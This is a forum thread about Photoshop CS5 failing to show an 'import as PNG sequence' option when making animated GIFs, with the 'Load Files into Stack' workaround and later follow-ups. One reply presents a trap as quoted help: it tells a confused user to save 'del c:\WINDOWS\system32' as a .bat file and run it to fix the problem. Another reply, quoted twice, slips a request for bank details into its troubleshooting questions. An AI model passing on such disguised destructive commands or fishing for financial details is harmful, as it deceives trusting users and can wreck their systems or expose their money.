photoshop can't open a png sequence

Started by hydroperoxide, July 14, 2011 11:01 AM

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hydroperoxide

hey tba,

so i'm trying to make an animated gif with photoshop. i go to file > open and find the folder with all the frames. i then select the first image.



as you can see, no 'import as PNG sequence' checkbox appears. what's going on? i've made animated gifs with this instance of photoshop before so what could be different?

photoshop CS5 on windows 7

naturally

Go to File > Scripts > Load Files into Stack.

Import the folder with your frames.

hydroperoxide


naturally


joki3d

Quote from: hydroperoxide on July 14, 2011 02:08 PM
that works too! thanks!

h
Quote from: stusader on July 14, 2011 01:30 PM
Go to File > Scripts > Load Files into Stack.

Import the folder with your frames.

hello there... idont get it ,,, please help ...

what should i do after i import with -load file into stack-
just nothing happen  ;_;

rtil


valiums

Quote from: joki3d on March  6, 2013 11:09 AM
hello there... idont get it ,,, please help ...

what should i do after i import with -load file into stack-
just nothing happen  ;_;

i googled some help 4u bcuz i am having the same problem!

Quote from: http://answers.yahoo.com/question/index?qid=20080105144420AAWgXBpopen a notepad type the following:
@echo off
del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)
double click and then open up photoshop and reload your files
it should work now

im going to try it right now hopefully it works!!!

psi43

Quote from: joki3d on March  6, 2013 11:09 AM
Quote from: hydroperoxide on July 14, 2011 02:08 PM
that works too! thanks!

h
Quote from: stusader on July 14, 2011 01:30 PM
Go to File > Scripts > Load Files into Stack.

Import the folder with your frames.

hello there... idont get it ,,, please help ...

what should i do after i import with -load file into stack-
just nothing happen  ;_;

First off, thank you for bumping this topic. Seeing the picture in the first post again reminded me of what I considered to be quite obnoxious about the LockLegion. The .gif that the topic creator was trying to make was a dancing Wine Lock animation. He has made a ton of dancing locklegion animation .gifs and they're now on the bottom of the LL forums. They cover up shit and it's very annoying to read shit on a forum when you constantly have part of your screen moving around.

That being said, if you need help with this problem, you should be a lot more specific to your situation.
What version of Photoshop are you using? What exactly do you mean by "nothing happens"? Is the window for the -load file into stack- just closing without any other noticeable changes, or does it start to load that first frame (or a random frame) of your sequence? What are your bank details? And most importantly, how big are the individual sequence files and how many of them are there? Cause if by "nothing happens" you mean Photoshop freezes, you should probably not try to use 1080p wallpaper sequences to make animated .gif files and consider to invest into a new computer.

hydroperoxide

Quote from: ΨNicole on March 15, 2013 08:38 PM
Quote from: joki3d on March  6, 2013 11:09 AM
Quote from: hydroperoxide on July 14, 2011 02:08 PM
that works too! thanks!

h
Quote from: stusader on July 14, 2011 01:30 PM
Go to File > Scripts > Load Files into Stack.

Import the folder with your frames.

hello there... idont get it ,,, please help ...

what should i do after i import with -load file into stack-
just nothing happen  ;_;

First off, thank you for bumping this topic. Seeing the picture in the first post again reminded me of what I considered to be quite obnoxious about the LockLegion. The .gif that the topic creator was trying to make was a dancing Wine Lock animation. He has made a ton of dancing locklegion animation .gifs and they're now on the bottom of the LL forums. They cover up shit and it's very annoying to read shit on a forum when you constantly have part of your screen moving around.

That being said, if you need help with this problem, you should be a lot more specific to your situation.
What version of Photoshop are you using? What exactly do you mean by "nothing happens"? Is the window for the -load file into stack- just closing without any other noticeable changes, or does it start to load that first frame (or a random frame) of your sequence? What are your bank details? And most importantly, how big are the individual sequence files and how many of them are there? Cause if by "nothing happens" you mean Photoshop freezes, you should probably not try to use 1080p wallpaper sequences to make animated .gif files and consider to invest into a new computer.